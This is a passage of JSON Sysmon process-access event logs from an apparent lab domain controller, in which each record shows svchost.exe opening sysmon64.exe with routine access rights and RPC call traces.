ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 